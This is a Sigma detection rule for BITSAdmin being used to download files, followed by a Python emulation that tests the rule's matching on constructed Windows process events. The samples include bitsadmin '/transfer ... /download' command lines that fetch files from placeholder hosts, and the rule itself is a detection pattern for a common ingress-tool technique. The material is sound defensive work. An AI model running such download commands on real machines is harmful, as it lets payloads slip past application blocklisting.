BITSAdmin Downloading Malicious Binaries

It is not unusual for adversaries, including ones who peddle ransomware, to use BITSAdmin to download arbitrary files from the internet in an effort to evade application blocklisting. The following analytic will look for the execution of bitsadmin.exe with command options that suggest a file is being downloaded. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule (View on GitHub)

```yaml
title: BITSAdmin Downloading Malicious Binaries
id: b195646e-8455-4fa1-b78a-91bb92371152
status: experimental
description: |
    It is not unusual for adversaries, including ones who peddle ransomware, to use
    BITSAdmin to download arbitrary files from the internet in an effort to evade
    application blocklisting. The following analytic will look for the execution of
    bitsadmin.exe with command options that suggest a file is being downloaded. Part
    of the RedCanary 2024 Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2024/03/21
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\bitsadmin.exe'
        CommandLine|contains:
            - 'download'
            - 'transfer'
    condition: selection
falsepositives:
    - Unknown
level: low
```
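To show concretely what the `selection` above does and does not match, here is an added Python emulation of the rule's matching logic (not part of the rule, Sigma, or RedCanary's tooling) run over constructed process_creation events. Field names follow the Sysmon/Sigma `Image` and `CommandLine` convention; every sample path, job name and URL is invented, and Sigma's case-insensitive string matching is assumed.

```python
"""Emulate the Sigma `selection` of the BITSAdmin rule over sample events.

Sigma's |endswith and |contains modifiers compare case-insensitively, so
both the event fields and the rule values are lower-cased before matching.
"""
from typing import Iterable, List

RULE_ID = "b195646e-8455-4fa1-b78a-91bb92371152"  # id of the rule above

# selection: Image|endswith AND (CommandLine|contains any of the list)
IMAGE_SUFFIX = "\\bitsadmin.exe"
COMMANDLINE_TERMS = ("download", "transfer")


def matches_bitsadmin_download(event: dict) -> bool:
    """Return True when the event satisfies the rule's `selection`."""
    image = str(event.get("Image", "")).lower()
    cmdline = str(event.get("CommandLine", "")).lower()
    if not image.endswith(IMAGE_SUFFIX):
        return False  # image constraint fails: keyword alone is not enough
    return any(term in cmdline for term in COMMANDLINE_TERMS)


def run_detection(events: Iterable[dict]) -> List[int]:
    """Return the ids of the events that fire the rule, in input order."""
    return [e["id"] for e in events if matches_bitsadmin_download(e)]


# Constructed sample events (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high "
                    r"https://files.example.invalid/update.bin C:\Users\Public\update.bin"},
    {"id": 2, "Image": r"C:\Windows\System32\BITSADMIN.EXE",  # mixed case, still matches
     "CommandLine": r"BITSADMIN.EXE /Transfer job2 https://cdn.example.invalid/x.dat C:\tmp\x.dat"},
    {"id": 3, "Image": r"C:\Windows\System32\bitsadmin.exe",  # enumeration only, no keyword
     "CommandLine": "bitsadmin /list /allusers"},
    {"id": 4, "Image": r"C:\Program Files\Browser\browser.exe",  # keyword but wrong image
     "CommandLine": r"browser.exe --download-dir=C:\tmp"},
    {"id": 5, "Image": r"C:\Windows\System32\bitsadmin.exe",  # resumes a job, no keyword
     "CommandLine": "bitsadmin /resume job1"},
]

if __name__ == "__main__":
    print(run_detection(SAMPLE_EVENTS))  # -> [1, 2]
```

Events 3 and 5 show why the rule is rated `low`: bitsadmin.exe is a legitimate tool, and only the download/transfer verbs, not its presence, fire the alert.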
